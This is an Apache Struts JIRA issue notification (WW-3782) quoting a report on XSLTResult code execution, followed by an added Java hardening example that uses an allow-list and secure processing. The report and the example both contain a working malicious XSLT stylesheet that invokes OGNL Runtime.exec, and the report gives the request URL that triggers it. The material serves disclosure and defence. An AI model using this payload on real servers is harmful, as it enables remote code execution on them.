Posted to issues@struts.apache.org by "Rene Gielen (Resolved) (JIRA)" <ji...@apache.org> on 2012/03/23 09:15:27 UTC

[jira] [Resolved] (WW-3782) Struts2 framework XSLTResult local file code execution vulnerability

     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Rene Gielen resolved WW-3782.
-----------------------------

    Resolution: Not A Problem

In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature of the XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.
                
> Struts2 framework XSLTResult local file code execution vulnerability
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Minor
>              Labels: patch
>             Fix For: 2.3.2
>
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> Struts2 allows an action to have several result types, including the XSLT type. This type accepts a file path submitted by the user and parses it as an XSLT file, regardless of the file extension.
>  This is the XSLTResult source code:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> // read the user-submitted "xslt.location" value
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> // parse the user-submitted file path as XSLT
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> Because of this code, as long as any action in the project uses xsltResult, an attacker can make the application parse a file the attacker uploaded as XSLT.
> Example of an action that uses xsltResult:
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT parsing allows Java static methods to be invoked, so the attacker only needs to upload a file to the server,
> for example:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> 		 version="1.0" xmlns:ognl="ognl.Ognl">
> 	<xsl:template match="/">
> 		<html> 
> 			<body> 
> 			   <h2>hacked by kxlzx</h2> 
> 			   <h2>http://www.inbreak.net</h2> 
> 			   <exp>
> 					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
> 				</exp>
> 			</body> 
> 		</html> 
> 	</xsl:template> 
> </xsl:stylesheet>
> When this xsl file is parsed, it invokes the OGNL call
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> which leads to arbitrary code execution.
> Suppose the address of an action with an XSLT result is
>  
> http://www.inbreak.net/xslt.action
>  
> Then the attacker can submit
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> which becomes
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
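The resolution above places the burden on the application developer: the stylesheet must come from the server side, not from the request. The following is an added example, not Struts code and not the reporter's code, showing the two controls a practitioner would want in an action that renders XSLT: the stylesheet name is taken from server-side configuration and checked against an allow-list inside a fixed directory (the directory /WEB-INF/xslt and the names report.xsl and summary.xsl are assumptions), and the TransformerFactory is created with FEATURE_SECURE_PROCESSING, under which the JDK's built-in XSLTC refuses to compile extension-function calls such as ognl:getValue. The attacker stylesheet is a constructed copy of the one in the report, trimmed to the extension call.

```java
import java.io.StringReader;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Set;

import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamSource;

/**
 * Added example (not Struts code): contrast the request-controlled lookup
 * described in WW-3782 with a hardened lookup that never lets the request
 * choose the stylesheet, and compile with secure processing so that the
 * JDK transformer rejects extension functions such as ognl:getValue.
 */
public class XsltLocationHardening {

    // Constructed stand-in for the uploaded /upload/7758521.gif from the report.
    static final String ATTACKER_STYLESHEET =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
      + "<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"\n"
      + "                xmlns:ognl=\"ognl.Ognl\">\n"
      + "  <xsl:template match=\"/\">\n"
      + "    <exp><xsl:value-of select=\"ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')\"/></exp>\n"
      + "  </xsl:template>\n"
      + "</xsl:stylesheet>\n";

    // Server-side allow-list of stylesheets an action may render with.
    // Directory and names are assumptions made for this example.
    static final Set<String> ALLOWED = Set.of("report.xsl", "summary.xsl");
    static final Path STYLESHEET_DIR = Paths.get("/WEB-INF/xslt");

    /** The shape the report describes: a request parameter, when present, overrides the configured path. */
    static String vulnerableLocation(String requestParam, String configured) {
        return requestParam != null ? requestParam : configured;
    }

    /** Hardened: the request is not consulted; a configured name is resolved inside a fixed directory. */
    static Path hardenedLocation(String configuredName) {
        if (configuredName == null || !ALLOWED.contains(configuredName)) {
            throw new IllegalArgumentException("stylesheet not on allow-list: " + configuredName);
        }
        Path resolved = STYLESHEET_DIR.resolve(configuredName).normalize();
        if (!resolved.startsWith(STYLESHEET_DIR)) {   // defence in depth against "../" in a misconfigured name
            throw new IllegalArgumentException("path escapes stylesheet directory: " + resolved);
        }
        return resolved;
    }

    /** Compile with secure processing enabled; the JDK's XSLTC then refuses extension-function calls. */
    static Templates compileSecurely(String stylesheet) throws TransformerConfigurationException {
        TransformerFactory factory = TransformerFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return factory.newTemplates(new StreamSource(new StringReader(stylesheet)));
    }

    public static void main(String[] args) {
        // 1. In the vulnerable shape the request-supplied path wins.
        System.out.println("vulnerable resolves to: "
            + vulnerableLocation("upload/7758521.gif", "/WEB-INF/xslt/report.xsl"));

        // 2. The hardened resolution only accepts configured, allow-listed names.
        System.out.println("hardened resolves to: " + hardenedLocation("report.xsl"));
        try {
            hardenedLocation("../../upload/7758521.gif");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // 3. Even if the attacker's stylesheet reached the factory, secure
        //    processing refuses the ognl:getValue extension call at compile time.
        try {
            compileSecurely(ATTACKER_STYLESHEET);
            System.out.println("compiled: extension functions are enabled on this transformer");
        } catch (TransformerConfigurationException e) {
            System.out.println("refused: " + e.getMessage());
        }
    }
}
```

Run it with a plain JDK (the built-in XSLTC); step 3 then reports "refused" with the transformer's message that the extension function is not allowed when secure processing is set. If a web application bundles a different TransformerFactory implementation (for example a standalone Xalan jar), check that provider's handling of the secure-processing feature separately rather than assuming the same result.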